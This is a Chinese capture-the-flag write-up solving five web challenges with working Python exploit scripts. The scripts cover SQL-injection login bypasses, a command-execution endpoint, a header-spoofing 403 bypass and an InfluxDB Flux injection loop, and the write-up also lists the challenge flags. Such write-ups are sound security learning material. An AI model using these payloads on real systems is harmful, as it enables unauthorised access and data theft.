WEB
Levi Ackerman
题目信息
Levi Ackerman is a robot!
N:B: There is no need to do bruteforce.
Author: saif
Target : http://66.228.53.87:5000/
我的解答:
签到题,题目提示了robot!
直接访问robots.txt得到路径
Disallow : /l3v1_4ck3rm4n.html
再次访问路径得到flag
KCTF{1m_d01n6_17_b3c4u53_1_h4v3_70}
Kitty
题目
Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.
N:B: There is no need to do bruteforce.
Author: Munazir (YCF)
Target : http://45.33.123.243:5020/
我的解答:
弱口令?试一下admin不对,查看源代码js发现
Dashboard查看源代码修改if语句的信息即可:"cat flag.txt"
即可得到flag
或者用SQL绕一下
import requests
session = requests.Session()
base_URL = 'http://45.33.123.243:5020/'
login_data = {
'username': 'yes',
'password': '" or 1=1; -- "'
}
req = session.post(f'{base_URL}login', json=login_data)
req = session.get(f'{base_URL}dashboard')
print(req.text)
这样就可以绕过登录名得到
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Modern Dashboard</title>
<link rel="stylesheet" href="/static/dashboard.css">
</head>
<body>
<div class="container">
<header>
<h1>Welcome to the Dashboard</h1>
</header>
<section class="content">
<h2>Latest Posts</h2>
<div class="post">
<h3>Post Title 1</h3>
<p>This is some content for the first post.</p>
</div>
<div class="post">
<h3>Post Title 2</h3>
<p>This is some content for the second post.</p>
</div>
<div class="post">
<h3>Post Title 3</h3>
<p>This is some content for the third post.</p>
</div>
<!-- You can add more posts dynamically here -->
</section>
<section class="posts">
<form id="postsForm" onsubmit="addPost(event)">
<label for="post_input">Enter Post:</label><br>
<input type="text" id="post_input" name="post_input">
<button type="submit">Execute</button>
</form>
</section>
</div>
<script>
function addPost(event) {
event.preventDefault();
const post_in = document.getElementById('post_input').value;
if (post_in.startsWith('cat flag.txt')) {
fetch('/execute', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: `post_input=${encodeURIComponent(post_in)}`
})
.then(response => response.text())
.then(result => {
const contentSection = document.querySelector('.content');
const newPost = document.createElement('div');
newPost.classList.add('post');
newPost.innerHTML = `<h3>Flag Post</h3><p>${result}</p>`;
contentSection.appendChild(newPost);
});
} else {
const contentSection = document.querySelector('.content');
const newPost = document.createElement('div');
newPost.classList.add('post');
newPost.innerHTML = `<h3>User Post</h3><p>${post_in}</p>`;
contentSection.appendChild(newPost);
}
}
</script>
</body>
</html>
然后修改脚本获取flag
import requests
session = requests.Session()
base_URL = 'http://45.33.123.243:5020/'
# forms data with sql injection
login_data = {
'username': 'yes',
'password': '" or 1=1; -- "'
}
# Login to get access to dashboard
req = session.post(f'{base_URL}login', json=login_data)
# Set params
payload = {'post_input': 'cat flag.txt'}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Retrieve flag
req = session.post(f'{base_URL}execute', data=payload, headers=headers)
print(req.text)
#KCTF{Fram3S_n3vE9_L1e_4_toGEtH3R}
Gain Access 1
题目信息
The web challenges are very much similar to real life application bugs. This is going to be a series of Gain Access with 3 challenges unlocks upon solving one by one. By solving these challenges, you'll gain a practical knowledge of Authentication Bypass Vulnerabilites as well as business logic error. The only difference is you'll not get any bounty but you'll get flags. Give it a try. And keep in mind, Don't make it hard, keep it simple. All the best. Solve the challenges & be a cyber knight.
No need to bruteforce. There's a rate limit. If you send continuous requests, you'll be blocked for 3 minutes.
Author: 0xt4req
Target : http://45.33.123.243:13556/
我的解答:
访问得到:
控制台发现账号: [email protected]
扫后台发现有个robots.txt
访问得到路径:/r3s3t_pa5s.php
进入出现提示:No token provided.
这里我们需要获取到token。。。。抓包吧!
在忘记密码的地方把邮箱输进去进行提交抓包得到token
然后我们继续回到/r3s3t_pa5s.php输入这个token便可重建密码
完成后会提示:Password Updated Succesfully.
再次登录进去就会发现flag。。。
或者我们也可以绕过password参数
exp:
import requests
session = requests.Session()
base_URL = 'http://45.33.123.243:13556/'
req = session.get(f'{base_URL}')
login_data = {
'admin_email': '[email protected]',
'admin_password': "' or 1=1; -- ",
'submit_btn': "Submit"
}
req = session.post(f'{base_URL}index.php', data=login_data)
print(req.text)
#KCTF{ACc0uNT_tAk3Over}
README
题目信息
Read me if you can!!
N:B: There is no need to do bruteforce.
Author: saif
Target : http://66.228.53.87:8989/
我的解答:
输入字段读取文件。。。写个脚本读取
import requests
base_URL = 'http://66.228.53.87:8989/'
file = "text.txt"
req = requests.get(f'{base_URL}fetch?file={file}')
print(req.text)
#{"result":"Yes! You can read files! Dont ask for hint its ezz!!"}
读取flag.txt得到错误
{"result":"403 Access Denied"}
我们需要绕过这个错误(本地读取即可)
import requests
base_URL = 'http://66.228.53.87:8989/'
file_path = "flag.txt"
# headers to bypass 403 Access Denied error
headers = {
'X-Originating-IP': '127.0.0.1',
'X-Forwarded-For': '127.0.0.1',
'X-Forwarded': '127.0.0.1',
'Forwarded-For': '127.0.0.1',
'X-Remote-IP': '127.0.0.1',
'X-Remote-Addr': '127.0.0.1',
'X-ProxyUser-Ip': '127.0.0.1',
'X-Original-URL': '127.0.0.1',
'Client-IP': '127.0.0.1',
'True-Client-IP': '127.0.0.1',
'Cluster-Client-IP': '127.0.0.1',
'X-ProxyUser-Ip': '127.0.0.1',
'Host': 'localhost'
}
req = requests.get(f'{base_URL}fetch?file={file_path}', headers=headers)
print(req.text)
#{"result":"KCTF{kud05w3lld0n3!}"}
Fluxx
题目信息
Recently I have made a simple app for monitoring and analyzing metrics, events, and real-time data.I used a database which is designed for handling high volumes of timestamped data. But I think its vulnerable find it and get he flag.
To be noted: The challenge resets after sometime. So please wait for a while if you see any error.
Author: saif
Target : http://66.228.53.87:9001/
我的解答:
访问网站
Please visit /query?data= to travel with time.
简单发送一下数据试试
import requests
base_URL = 'http://66.228.53.87:9001/'
data = '1" OR 1=1--'
req = requests.get(f'{base_URL}query?data={data}')
print(req.text)
得到信息
HttpError: compilation failed: error @1:82-1:158: expected RPAREN, got EOF
error @1:152-1:153: invalid expression @1:151-1:152: =
error @1:155-1:158: got unexpected token in string expression @1:158-1:158: EOF
根据题目信息自行搜索发现一篇参考文章介绍了这个错误:https://community.influxdata.com/t/query-throws-rparen-got-eof-error/18940
新知识:InfluxDB nosql注入 可参考:https://rafa.hashnode.dev/influxdb-nosql-injection
") |> yield(name: "1337")
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name))
//
爆破exp:
import requests, urllib.parse
base_URL = 'http://66.228.53.87:9001/'
letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for char in list(letters):
payload = f'") |> yield(name: "1337")\nbuckets() |> filter(fn: (r) => r.name =~ /^{char}.*/ and die(msg:r.name))\n//'
encoded_payload = urllib.parse.quote(payload, safe='')
req = requests.get(f'{base_URL}query?data={encoded_payload}')
if req.text != '[]':
print(req.text)
#KCTF{g0UPqVWa0eUT2wF2ipzX3v5pxikvqYhxR9OL}
标签:WEB,URL,req,2024,base,做题,post,data,requests From: https://www.cnblogs.com/mumuhhh/p/17982873